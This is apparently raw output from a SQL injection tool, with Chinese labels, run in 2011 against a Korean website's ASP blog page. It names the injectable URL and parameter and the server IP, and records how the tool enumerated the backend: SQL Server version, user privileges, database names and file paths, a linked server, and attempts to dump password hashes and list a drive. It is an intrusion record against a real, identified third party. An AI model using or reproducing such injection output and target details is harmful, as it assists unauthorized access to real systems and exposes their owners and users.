■漏洞信息:============================================================
 ・URL:http://www.mjm.co.kr/mjm/blog/perblog/list.asp?id=homihomi&category=%C7%B3%B0%E6%20%C0%D6%B4%C2%20%BB%E7%C1%F8
 ・页面标题：龋固槛 磊傈芭 鸥绊 荤柳咯青
 ・参数:id=homihomi&category=%C7%B3%B0%E6%20%C0%D6%B4%C2%20%BB%E7%C1%F8
 ・方法:GET
 ・类型:String
 ・利用方法:And
 ・脚本语言:asp
 ・IP:221.139.0.162
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 04 Apr 2011 07:26:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 93829
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAAQBCBB=DOHPGJGACMCIAPPNGHABNLJC; path=/
Cache-control: private



■数据库信息:============================================================
批次获取基本信息失败，开始逐一获取……
 ・当前数据库:mjm
 ・版本:Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) 
	Dec 16 2008 19:46:53 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
club	E:\DB_MJM\club_Data.MDF	
gallerywa_new	D:\DB_Gallerywa\gallerywa_new_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
mjm	E:\DB_MJM\mjm_Data.MDF	
mjm_photo	E:\DB_MJM\mjm_photo_Data.MDF	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
PerfAnalysis	C:\Program Files\Microsoft SQL Server\MSSQL\data\PerfAnalysis_Data.MDF	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
JOONGANG21	SQL Server	SQLOLEDB	JOONGANG21		JOONGANG21	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 
一次性获取失败，正在批次获取……
